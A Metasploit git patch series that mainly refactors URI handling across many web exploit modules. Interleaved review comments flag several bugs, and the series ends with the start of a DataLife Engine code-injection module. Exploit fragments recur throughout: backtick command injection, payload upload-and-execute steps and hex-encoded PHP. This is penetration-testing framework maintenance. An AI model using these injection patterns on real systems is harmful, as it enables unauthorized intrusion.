
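Review bot: In basilic_diff_exec.rb `check`, `base` is normalized once and then interpolated into a second `normalize_uri("/#{base}/Config/diff.php")` call, which leans on the helper to clean up the doubled slashes that the string itself creates. Passing the parts directly reads more plainly: `'uri' => normalize_uri(target_uri.path, 'Config', 'diff.php'),`, after which the `base` local is unnecessary in the visible lines. The `exploit` hunk in the same file repeats the pattern.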
@@ -58,12 +58,11 @@ def initialize(info={}) end def check - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}egallery/uploadify.php" + 'uri' => normalize_uri(uri, "egallery", "uploadify.php") }) if res and res.code == 200 and res.body.empty? @@ -97,7 +96,7 @@ def exploit print_status("#{peer} - Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}egallery/uploadify.php", + 'uri' => normalize_uri("#{uri}egallery/uploadify.php"), 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => post_data }) @@ -113,7 +112,7 @@ def exploit # Execute our payload res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}#{payload_name}" + 'uri' => normalize_uri("#{uri}#{payload_name}") }) # If we don't get a 200 when we request our malicious payload, we suspect diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb index 0ccb1efcfdfd..c7fa522c9fd6 100644 --- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb +++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb @@ -54,9 +54,8 @@ def initialize(info = {}) end def check - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=' + uri = normalize_uri(datastore['URI'], 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php') + uri << '?type=file&folder=' res = send_request_raw( { 'uri' => uri diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb index 7f9b9cd6f0c2..546bd1cf11a7 100644 --- a/modules/exploits/unix/webapp/openx_banner_edit.rb +++ b/modules/exploits/unix/webapp/openx_banner_edit.rb 
@@ -68,9 +68,7 @@ def initialize(info = {}) end def check - uri = normalize_uri(datastore['URI']) - uri << '/' if uri[-1,1] != '/' - uri << 'www/admin/' + uri = normalize_uri(datastore['URI'], 'www', 'admin/') res = send_request_raw( { 'uri' => uri @@ -108,9 +106,7 @@ def exploit # Static files img_dir = 'images/' - uri_base = normalize_uri(datastore['URI']) - uri_base << '/' if uri_base[-1,1] != '/' - uri_base << 'www/' + uri_base = normalize_uri(datastore['URI'], 'www/') # Need to login first :-/ cookie = openx_login(uri_base) @@ -166,7 +162,7 @@ def openx_login(uri_base) res = send_request_raw( { - 'uri' => uri_base + 'admin/index.php' + 'uri' => normalize_uri(uri_base, 'admin/index.php') }, 10) if not (res and res.body =~ /oa_cookiecheck\" value=\"([^\"]+)\"/) return nil @@ -176,7 +172,7 @@ def openx_login(uri_base) res = send_request_cgi( { 'method' => 'POST', - 'uri' => uri_base + 'admin/index.php', + 'uri' => normalize_uri(uri_base, 'admin/index.php'), 'vars_post' => { 'oa_cookiecheck' => cookie, @@ -201,7 +197,7 @@ def openx_login(uri_base) def openx_find_campaign(uri_base, cookie) res = send_request_raw( { - 'uri' => uri_base + 'admin/advertiser-campaigns.php', + 'uri' => normalize_uri(uri_base, 'admin/advertiser-campaigns.php'), 'headers' => { 'Cookie' => "sessionID=#{cookie}; PHPSESSID=#{cookie}", @@ -269,7 +265,7 @@ def openx_upload_banner(uri_base, cookie, adv_id, camp_id, code_img) res = send_request_raw( { - 'uri' => uri_base + "admin/banner-edit.php", + 'uri' => normalize_uri(uri_base, "admin/banner-edit.php"), 'method' => 'POST', 'data' => data, 'headers' => @@ -287,7 +283,7 @@ def openx_upload_banner(uri_base, cookie, adv_id, camp_id, code_img) # Ugh, now we have to get the banner id! res = send_request_raw( { - 'uri' => uri_base + "admin/campaign-banners.php?clientid=#{adv_id}&campaignid=#{camp_id}", + 'uri' => normalize_uri(uri_base, "admin/campaign-banners.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}", 'method' => 'GET', 'headers' => { 
@@ -319,7 +315,7 @@ def openx_find_banner_filename(uri_base, cookie, adv_id, camp_id, ban_id) # Ugh, now we have to get the banner name too! res = send_request_raw( { - 'uri' => uri_base + "admin/banner-edit.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}", + 'uri' => normalize_uri(uri_base, "admin/banner-edit.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}", 'method' => 'GET', 'headers' => { @@ -338,7 +334,7 @@ def openx_find_banner_filename(uri_base, cookie, adv_id, camp_id, ban_id) def openx_banner_delete(uri_base, cookie, adv_id, camp_id, ban_id) res = send_request_raw( { - 'uri' => uri_base + "admin/banner-delete.php?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}", + 'uri' => normalize_uri(uri_base, "admin/banner-delete.php") + "?clientid=#{adv_id}&campaignid=#{camp_id}&bannerid=#{ban_id}", 'method' => 'GET', 'headers' => { diff --git a/modules/exploits/unix/webapp/oscommerce_filemanager.rb b/modules/exploits/unix/webapp/oscommerce_filemanager.rb index 66fa7d4ca279..7ca3dc9b5899 100644 --- a/modules/exploits/unix/webapp/oscommerce_filemanager.rb +++ b/modules/exploits/unix/webapp/oscommerce_filemanager.rb @@ -78,7 +78,7 @@ def exploit print_status("Sending file save request") response = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + "/" + "admin/file_manager.php/login.php?action=save", + 'uri' => normalize_uri(datastore['URI'], "admin/file_manager.php/login.php") + "?action=save", 'method' => 'POST', 'data' => data, 'headers' => @@ -101,7 +101,7 @@ def exploit response = send_request_raw({ # Allow findsock payloads to work 'global' => true, - 'uri' => normalize_uri(datastore['URI']) + "/" + File.basename(filename) + 'uri' => normalize_uri(datastore['URI'], File.basename(filename)) }, timeout) handler diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb index 9526b9f2fa63..e6fcd817266d 100644 
--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb +++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb @@ -54,12 +54,11 @@ def initialize(info = {}) end def check - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php" + 'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php") }) if res and res.code == 200 @@ -83,7 +82,7 @@ def exploit res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}wp-content/plugins/foxypress/uploadify/uploadify.php", + 'uri' => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php"), 'ctype' => 'multipart/form-data; boundary=' + post_data.bound, 'data' => post_data.to_s }) @@ -96,7 +95,7 @@ def exploit print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...") res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}wp-content/affiliate_images/#{$1}.php" + 'uri' => normalize_uri(uri, "wp-content/affiliate_images", "#{$1}.php") }) if res and res.code != 200 diff --git a/modules/exploits/unix/webapp/phpbb_highlight.rb b/modules/exploits/unix/webapp/phpbb_highlight.rb index 60dc44e64303..f19ece646e11 100644 --- a/modules/exploits/unix/webapp/phpbb_highlight.rb +++ b/modules/exploits/unix/webapp/phpbb_highlight.rb @@ -70,7 +70,7 @@ def find_topic 1.upto(32) do |x| res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + '/viewtopic.php?topic=' + x.to_s, + 'uri' => normalize_uri(datastore['URI'], '/viewtopic.php') + '?topic=' + x.to_s, }, 25) if (res and res.body.match(/class="postdetails"/)) 
@@ -92,14 +92,14 @@ def exploit return else - sploit = normalize_uri(datastore['URI']) + "/viewtopic.php?t=#{topic}&highlight=" + sploit = normalize_uri(datastore['URI'], "/viewtopic.php") + "?t=#{topic}&highlight=" case target.name when /Automatic/ req = "/viewtopic.php?t=#{topic}&highlight=%2527%252ephpinfo()%252e%2527" res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + req + 'uri' => normalize_uri(datastore['URI'], req) }, 25) print_status("Trying to determine which attack method to use...") diff --git a/modules/exploits/unix/webapp/phpmyadmin_config.rb b/modules/exploits/unix/webapp/phpmyadmin_config.rb index f215e4b11a46..55f894ffc361 100644 --- a/modules/exploits/unix/webapp/phpmyadmin_config.rb +++ b/modules/exploits/unix/webapp/phpmyadmin_config.rb @@ -74,7 +74,7 @@ def initialize(info = {}) def exploit # First, grab the session cookie and the CSRF token print_status("Grabbing session cookie and CSRF token") - uri = normalize_uri(datastore['URI']) + "/scripts/setup.php" + uri = normalize_uri(datastore['URI'], "/scripts/setup.php") response = send_request_raw({ 'uri' => uri}) if !response fail_with(Exploit::Failure::NotFound, "Failed to retrieve hash, server may not be vulnerable.") @@ -101,7 +101,7 @@ def exploit # Now that we've got the cookie and token, send the evil print_status("Sending save request") response = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + "/scripts/setup.php", + 'uri' => normalize_uri(datastore['URI'], "/scripts/setup.php"), 'method' => 'POST', 'data' => data, 'cookie' => cookie, @@ -120,7 +120,7 @@ def exploit response = send_request_raw({ # Allow findsock payloads to work 'global' => true, - 'uri' => normalize_uri(datastore['URI']) + "/config/config.inc.php" + 'uri' => normalize_uri(datastore['URI'], "/config/config.inc.php") }, timeout) handler 
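Review bot: In phpbb_highlight.rb `exploit`, the new `'uri' => normalize_uri(datastore['URI'], req)` passes a whole query string through `normalize_uri`, because `req` already contains `?t=...&highlight=...`. Two lines earlier `sploit` is built the other way, with the query appended after the call. The spec added later in this series shows that `normalize_uri` collapses doubled `/`, so any parameter value containing `//` would be silently rewritten. Pass only the path and append the query afterwards, as in `normalize_uri(datastore['URI'], '/viewtopic.php') + query`, where `query` stands for the query part of `req`. The same pattern appears in tikiwiki_graph_formula_exec.rb `build_uri`, the `cmd_base` lines of twiki_history.rb and twiki_search.rb, sybase_easerver.rb (`'/Login.jsp?'`) and sphpblog_file_upload.rb `delete_file`; the body of `exploit` continues outside this hunk.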
diff --git a/modules/exploits/unix/webapp/projectpier_upload_exec.rb b/modules/exploits/unix/webapp/projectpier_upload_exec.rb index 06af2b28c79d..4b5b2a474518 100644 --- a/modules/exploits/unix/webapp/projectpier_upload_exec.rb +++ b/modules/exploits/unix/webapp/projectpier_upload_exec.rb @@ -63,7 +63,7 @@ def check res = send_request_cgi( { 'method' => 'GET', - 'uri' => "#{base}/index.php", + 'uri' => normalize_uri("#{base}/index.php"), 'vars_get' => { 'c' => 'access', diff --git a/modules/exploits/unix/webapp/redmine_scm_exec.rb b/modules/exploits/unix/webapp/redmine_scm_exec.rb index 83de69d3d734..9de06547ac8b 100644 --- a/modules/exploits/unix/webapp/redmine_scm_exec.rb +++ b/modules/exploits/unix/webapp/redmine_scm_exec.rb @@ -55,7 +55,7 @@ def initialize(info = {}) def exploit command = Rex::Text.uri_encode(payload.encoded) - urlconfigdir = normalize_uri(datastore['URI']) + "/repository/annotate?rev=`#{command}`" + urlconfigdir = normalize_uri(datastore['URI'], "/repository/annotate") + "?rev=`#{command}`" res = send_request_raw({ 'uri' => urlconfigdir, diff --git a/modules/exploits/unix/webapp/sphpblog_file_upload.rb b/modules/exploits/unix/webapp/sphpblog_file_upload.rb index 6e1c95852ac0..07465ee23686 100644 --- a/modules/exploits/unix/webapp/sphpblog_file_upload.rb +++ b/modules/exploits/unix/webapp/sphpblog_file_upload.rb @@ -57,7 +57,7 @@ def initialize(info = {}) def check res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + '/index.php' + 'uri' => normalize_uri(datastore['URI'], '/index.php') }, 25) if (res and res.body =~ /Simple PHP Blog (\d)\.(\d)\.(\d)/) @@ -79,7 +79,7 @@ def check def retrieve_password_hash(file) res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + file, + 'uri' => normalize_uri(datastore['URI'], file) }, 25) if (res and res.message == "OK" and res.body) 
@@ -94,7 +94,7 @@ def retrieve_password_hash(file) def create_new_password(user, pass) res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']) + '/install03_cgi.php', + 'uri' => normalize_uri(datastore['URI'], '/install03_cgi.php'), 'method' => 'POST', 'data' => "user=#{user}&pass=#{pass}", }, 25) @@ -109,7 +109,7 @@ def create_new_password(user, pass) def retrieve_session(user, pass) res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']) + "/login_cgi.php", + 'uri' => normalize_uri(datastore['URI'], "/login_cgi.php"), 'method' => 'POST', 'data' => "user=#{user}&pass=#{pass}", }, 25) @@ -139,7 +139,7 @@ def upload_page(session, dir, newpage, contents) data << "\r\n--#{boundary}--" res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + "/upload_img_cgi.php", + 'uri' => normalize_uri(datastore['URI'], "/upload_img_cgi.php"), 'method' => 'POST', 'data' => data, 'headers' => @@ -160,7 +160,7 @@ def upload_page(session, dir, newpage, contents) def reset_original_password(hash, scriptlocation) res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']) + scriptlocation, + 'uri' => normalize_uri(datastore['URI'], scriptlocation), 'method' => 'POST', 'data' => "hash=" + hash, }, 25) @@ -177,7 +177,7 @@ def delete_file(file) delete_path = "/comment_delete_cgi.php?y=05&m=08&comment=.#{file}" res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + delete_path, + 'uri' => normalize_uri(datastore['URI'], delete_path), }, 25) if (res) diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb index 40311c1ed3f7..9f8aadb6213c 100644 --- a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb @@ -75,7 +75,6 @@ def on_new_session(client) def exploit base = normalize_uri(target_uri.path) - base << '/' if base[-1, 1] != '/' @peer = "#{rhost}:#{rport}" username = datastore['USERNAME'] 
@@ -89,7 +88,7 @@ def exploit res = send_request_cgi( { - 'uri' => "#{base}index.php" , + 'uri' => normalize_uri(base, "index.php") , 'method' => "POST", 'headers' => { diff --git a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb index a051069c938e..99f57424e15e 100644 --- a/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb @@ -58,7 +58,7 @@ def initialize(info = {}) def check res = send_request_raw( { - 'uri' => normalize_uri(datastore['URI']) + "/tiki-index.php", + 'uri' => normalize_uri(datastore['URI'], "/tiki-index.php"), 'method' => 'GET', 'headers' => { @@ -155,8 +155,7 @@ def exploit # when exploiting this vulnerability :) # def build_uri(f_val) - uri = normalize_uri(datastore['URI']) - uri << "/tiki-graph_formula.php?" + uri = normalize_uri(datastore['URI'], "/tiki-graph_formula.php?") # Requirements: query = '' diff --git a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb index c2f500447e3d..7fac9b73f102 100644 --- a/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb @@ -59,7 +59,7 @@ def initialize(info = {}) def check res = send_request_raw( { - 'uri' => normalize_uri(datastore['URI']) + "/tiki-index.php", + 'uri' => normalize_uri(datastore['URI'], "/tiki-index.php"), 'method' => 'GET' }, 25) @@ -82,7 +82,7 @@ def exploit end def create_temp_file - url_jhot = normalize_uri(datastore['URI']) + "/jhot.php" + url_jhot = normalize_uri(datastore['URI'], "/jhot.php") scode = "\x0d\x0a\x3c\x3f\x70\x68\x70\x0d\x0a\x2f\x2f\x20\x24\x48\x65\x61" + @@ -153,7 +153,7 @@ def create_temp_file end def exe_command(cmd) - url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php" + url_config = normalize_uri(datastore['URI'], "/img/wiki/tiki-config.php") res = send_request_raw({ 'uri' => url_config, 
@@ -182,7 +182,7 @@ def exe_command(cmd) end def remove_temp_file - url_config = normalize_uri(datastore['URI']) + "/img/wiki/tiki-config.php" + url_config = normalize_uri(datastore['URI'], "/img/wiki/tiki-config.php") res = send_request_raw({ 'uri' => url_config, diff --git a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb index f6908cbf6d02..bb5f625e5670 100644 --- a/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/tikiwiki_unserialize_exec.rb @@ -78,7 +78,7 @@ def on_new_session(client) end def exploit - base = normalize_uri(target_uri.path) + base = target_uri.path base << '/' if base[-1, 1] != '/' @upload_php = rand_text_alpha(rand(4) + 4) + ".php" @peer = "#{rhost}:#{rport}" @@ -86,7 +86,7 @@ def exploit print_status("#{@peer} - Disclosing the path of the Tiki Wiki on the filesystem") res = send_request_cgi( - 'uri' => "#{base}tiki-rss_error.php" + 'uri' => normalize_uri(base, "tiki-rss_error.php") ) if not res or res.code != 200 or not res.body =~ /[> ](\/.*)tiki-rss_error\.php/ @@ -112,7 +112,7 @@ def exploit res = send_request_cgi( { - 'uri' => "#{base}tiki-print_multi_pages.php", + 'uri' => normalize_uri(base, "tiki-print_multi_pages.php"), 'method' => 'POST', 'vars_post' => { 'printpages' => printpages @@ -129,7 +129,7 @@ def exploit res = send_request_cgi( { 'method' => 'GET', - 'uri' => "#{base + @upload_php}", + 'uri' => normalize_uri(base, @upload_php), 'headers' => { 'Cmd' => Rex::Text.encode_base64(payload.encoded) } diff --git a/modules/exploits/unix/webapp/twiki_history.rb b/modules/exploits/unix/webapp/twiki_history.rb index 42bccd1b2f70..98b628b9f868 100644 --- a/modules/exploits/unix/webapp/twiki_history.rb +++ b/modules/exploits/unix/webapp/twiki_history.rb 
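Review bot: In tikiwiki_unserialize_exec.rb `exploit`, the retained `base << '/' if base[-1, 1] != '/'` now appends in place to the string returned by `target_uri.path`, where it previously appended to the result of `normalize_uri`. Whether `target_uri` returns a fresh object on each call is not visible here, so the mutation may or may not leak into later uses. The trailing slash is also no longer needed, since every later use in this file goes through `normalize_uri(base, ...)`. Drop the `<<` line, as this commit already does in sugarcrm_unserialize_exec.rb, or keep `base = normalize_uri(target_uri.path)` so the module works on its own copy.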
@@ -61,8 +61,8 @@ def initialize(info = {}) # def check test_file = rand_text_alphanumeric(8+rand(8)) - cmd_base = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers?rev=' - test_url = normalize_uri(datastore['URI']) + '/' + test_file + cmd_base = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers?rev=') + test_url = normalize_uri(datastore['URI'], test_file) # first see if it already exists (it really shouldn't) res = send_request_raw({ @@ -109,7 +109,7 @@ def exploit rev = rand_text_numeric(1+rand(5)) rev << ' `' + payload.encoded + '`#' - query_str = normalize_uri(datastore['URI']) + '/view/Main/TWikiUsers' + query_str = normalize_uri(datastore['URI'], '/view/Main/TWikiUsers') query_str << '?rev=' query_str << Rex::Text.uri_encode(rev) diff --git a/modules/exploits/unix/webapp/twiki_search.rb b/modules/exploits/unix/webapp/twiki_search.rb index 741f7eef42a5..b27a6f4e2366 100644 --- a/modules/exploits/unix/webapp/twiki_search.rb +++ b/modules/exploits/unix/webapp/twiki_search.rb @@ -56,8 +56,8 @@ def initialize(info = {}) def check content = rand_text_alphanumeric(16+rand(16)) test_file = rand_text_alphanumeric(8+rand(8)) - cmd_base = normalize_uri(datastore['URI']) + '/view/Main/WebSearch?search=' - test_url = normalize_uri(datastore['URI']) + '/view/Main/' + test_file + cmd_base = normalize_uri(datastore['URI'], '/view/Main/WebSearch?search=') + test_url = normalize_uri(datastore['URI'], '/view/Main/', test_file) # first see if it already exists (it really shouldn't) res = send_request_raw({ @@ -105,13 +105,13 @@ def exploit search = rand_text_alphanumeric(1+rand(8)) search << "';" + payload.encoded + ";#\'" - query_str = normalize_uri(datastore['URI']) + '/view/Main/WebSearch' + query_str = normalize_uri(datastore['URI'], '/view/Main/WebSearch') query_str << '?search=' query_str << Rex::Text.uri_encode(search) res = send_request_cgi({ 'method' => 'GET', - 'uri' => query_str, + 'uri' => query_str, }, 25) if (res and res.code == 200) 
diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index c73b3b2499c1..e38a0979c8a6 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -62,7 +62,7 @@ def initialize(info={}) def check - res = send_request_raw({'uri'=>normalize_uri(target_uri.host)}) + res = send_request_raw({'uri'=>normalize_uri(target_uri.path)}) if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/ return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/windows/http/sybase_easerver.rb b/modules/exploits/windows/http/sybase_easerver.rb index e0959186453e..3fd2b947b875 100644 --- a/modules/exploits/windows/http/sybase_easerver.rb +++ b/modules/exploits/windows/http/sybase_easerver.rb @@ -70,7 +70,7 @@ def exploit # Sending the request res = send_request_cgi({ - 'uri' => normalize_uri(datastore['DIR']) + '/Login.jsp?' + crash, + 'uri' => normalize_uri(datastore['DIR'], '/Login.jsp?') + crash, 'method' => 'GET', 'headers' => { 'Accept' => '*/*', diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index 76322d9aab6e..9d43164587b5 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -126,11 +126,11 @@ def get_sid pass = datastore['SysaxPASS'] creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" - uri = normalize_uri(target_uri.to_s) + uri = target_uri.to_s # Login to get SID value r = send_request_cgi({ 'method' => "POST", - 'uri' => "#{uri}/scgi?sid=0&pid=dologin", + 'uri' => normalize_uri("#{uri}/scgi?sid=0&pid=dologin"), 'data' => creds }) 
@@ -148,7 +148,7 @@ def get_root_path(sid) random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir uri normalize_uri(target_uri.to_s) r = send_request_cgi({ - 'uri' => "#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", + 'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm"), 'method' => 'POST', }) @@ -184,7 +184,7 @@ def exploit post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" uri = normalize_uri(target_uri.to_s) r = send_request_cgi({ - 'uri' => "#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm", + 'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm"), 'method' => 'POST', 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index 137a1686c862..b97524a3df7f 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -85,7 +85,7 @@ def exploit data = 'Content-Type: ' + sploit res = send_request_raw({ - 'uri' => normalize_uri(datastore['PATH']) + '/AdvancedDataFactory.Query', + 'uri' => normalize_uri(datastore['PATH'], '/AdvancedDataFactory.Query'), 'headers' => { 'Content-Length' => data.length, diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 60d1f7b81448..d3383308dfc0 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -128,7 +128,7 @@ def exec_cmd(sql, cmd, d) data << sploit res = send_request_raw({ - 'uri' => normalize_uri(datastore['PATH']) + '/' + method, + 'uri' => normalize_uri(datastore['PATH'], method), 'agent' => 'ACTIVEDATA', 'headers' => { 
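Review bot: In sysax_create_folder.rb `get_root_path`, the context line `uri normalize_uri(target_uri.to_s)` has no `=`, so Ruby parses it as a call to a method named `uri` rather than an assignment. The rewritten `'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm")` then interpolates a `uri` that was never set. Unless the module defines a `uri` method elsewhere, this probably raises NoMethodError before any request is sent. The line should read `uri = normalize_uri(target_uri.to_s)`. The rest of `get_root_path` is outside the hunk.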
@@ -200,7 +200,7 @@ def find_exec data << "\r\n\r\n--#{boundary}--\r\n" res = send_request_raw({ - 'uri' => normalize_uri(datastore['PATH']) + '/VbBusObj.VbBusObjCls.GetMachineName', + 'uri' => normalize_uri(datastore['PATH'], '/VbBusObj.VbBusObjCls.GetMachineName'), 'agent' => 'ACTIVEDATA', 'headers' => { From 66ca906bfb7b1d7bffecc8e6e45905f98fe88b8f Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 01:56:05 -0600 Subject: [PATCH 207/421] This is a string, not a variable --- modules/exploits/multi/http/mobilecartly_upload_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index 61f076de2f71..34ea77ce51df 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -109,7 +109,7 @@ def exploit # Run payload # print_status("#{@peer} - Requesting '#{php_fname}'") - send_request_cgi({ 'uri' => normalize_uri(base, pages, php_fname) }) + send_request_cgi({ 'uri' => normalize_uri(base, 'pages', php_fname) }) handler end From 4de5e475c30358656821252021686240e919fac2 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 02:15:50 -0600 Subject: [PATCH 208/421] Fix check --- modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index e38a0979c8a6..c73b3b2499c1 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb 
@@ -62,7 +62,7 @@ def initialize(info={}) def check - res = send_request_raw({'uri'=>normalize_uri(target_uri.path)}) + res = send_request_raw({'uri'=>normalize_uri(target_uri.host)}) if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/ return Exploit::CheckCode::Vulnerable From 365e1b055749fc33a9d2550335ad1c3b96fe3a82 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Thu, 31 Jan 2013 16:09:14 +0100 Subject: [PATCH 209/421] added module for cve-2013-1412 --- .../unix/webapp/datalife_preview_exec.rb | 94 +++++++++++++++++++ 1 file changed, 94 insertions(+) create mode 100644 modules/exploits/unix/webapp/datalife_preview_exec.rb diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb new file mode 100644 index 000000000000..2d3a1398ff4d --- /dev/null +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb 
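Review bot: In sonicwall_scrutinizer_sqli.rb `check`, `normalize_uri(target_uri.host)` supplies the host component of the target URI where `send_request_raw` expects a request path in `'uri'`. If the intent of "Fix check" is to fetch the base page regardless of TARGETURI, say so directly with `'uri' => '/'` and a short comment. As written, the request path depends on whatever `host` happens to return; for a path-only TARGETURI that is presumably nil. The version regex that follows only tells an operator something reliable if the page requested is the one intended.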
@@ -0,0 +1,94 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DataLife Engine preview.php PHP Code Injection', + 'Description' => %q{ + This module exploits a PHP code injection vulnerability DataLife Engine 9.7. + The vulnerability exists in preview.php, due to an insecure usage of preg_replace() + with the e modifier, which allows to inject arbitrary php code, when the template + in use contains a [catlist] or [not-catlist] tag. + }, + 'Author' => + [ + 'EgiX', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2013-1412' ], + [ 'BID', '57603' ], + [ 'EDB', '24438' ], + [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ], + [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ] + ], + 'Privileged' => false, + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Payload' => + { + 'Keys' => ['php'] + }, + 'DisclosureDate' => 'Jan 28 2013', + 'Targets' => [ ['DataLife Engine 9.7', { }], ], + 'DefaultTarget' => 0 + )) + + register_options( 